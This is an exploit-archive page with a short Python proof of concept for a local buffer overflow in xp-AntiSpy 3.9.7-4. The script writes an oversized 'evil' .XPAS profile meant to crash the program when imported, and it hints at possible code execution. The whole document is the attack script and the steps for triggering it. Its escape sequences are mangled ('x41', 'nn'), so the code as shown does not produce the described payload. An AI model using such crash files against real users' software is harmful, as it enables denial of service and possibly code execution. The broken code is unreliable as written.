xp-AntiSpy 3.9.7-4 xpas file BoF

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : xp-AntiSpy 3.9.7-4 xpas file BoF
# Published : 2009-10-26
# Author : Dr_IDE
# Previous Title : VMWare Virtual 8086 Linux Local Ring0 Exploit
# Next Title : proc File Descriptors Directory Permissions bypass

#!/usr/bin/env python

######################################################################
#
# xp-AntiSpy <= 3.9.7-4 Local (.XPAS File) Local Buffer Overflow PoC
# Found By:	Dr_IDE
# Tested On:	XPSP3
# Notes:
# 1) The program does not check the imported data in any way.
# 2) If you import this profile and select it, the program will crash.
# 3) We get a hold of a register so execution may be possible?
#
######################################################################

buff = ("x41" * 5000);

sploit = (buff)

try:
	print ("nn#############################################################");
	print ("# xp-AntiSpy <= 3.9.7-4 Local (.XPAS File) Local DoS Exploit");
	print ("# By: Dr_IDE");
	print ("# pocoftheday.blogspot.com");
	print ("#############################################################n");
	print ("[*] Writing evil .XPAS profile file.");
	f1 = open("Dr_IDEs_Evil_Profile.xpas","w");
	f1.write(sploit);
	f1.close();
	print ('[*] Success. Import File and Click "File -> Evil Profile".');

except:
	print ("[-] Error, could not write the file.");

#[pocoftheday.blogspot.com]